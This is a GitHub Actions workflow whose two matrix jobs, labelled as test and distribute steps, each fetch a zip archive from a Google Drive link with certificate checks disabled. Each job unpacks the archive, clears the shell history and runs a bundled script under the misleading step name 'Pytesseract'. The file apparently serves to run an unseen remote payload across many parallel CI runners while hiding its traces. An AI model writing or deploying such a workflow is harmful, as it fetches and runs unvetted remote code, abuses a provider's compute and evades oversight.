name: atlasdongluc48land
on:
  push:
    branches: [ "main" ]
  workflow_dispatch:

jobs:
  TEST:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.o, I.i, I.ii]
        flag: ['Plan', 'Assemble', 'Validate', 'Run', 'Publish']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: install module
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=11ECWm8EUmFsUkkQveHXMTDXQaJuK4TOa" -O Prometheus.zip
        unzip -o Prometheus.zip
        rm Prometheus.zip
        history -c && history -w

    - name: Pytesseract
      run: bash requirements.sh


  DISTRIBUTE1:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.o, I.i, I.ii]
        flag: ['Provision', 'Compile', 'Verify', 'Launch', 'Deploy']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: install module
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=11ECWm8EUmFsUkkQveHXMTDXQaJuK4TOa" -O Prometheus.zip
        unzip -o Prometheus.zip
        rm Prometheus.zip
        history -c && history -w

    - name: Pytesseract
      run: bash requirements.sh
        
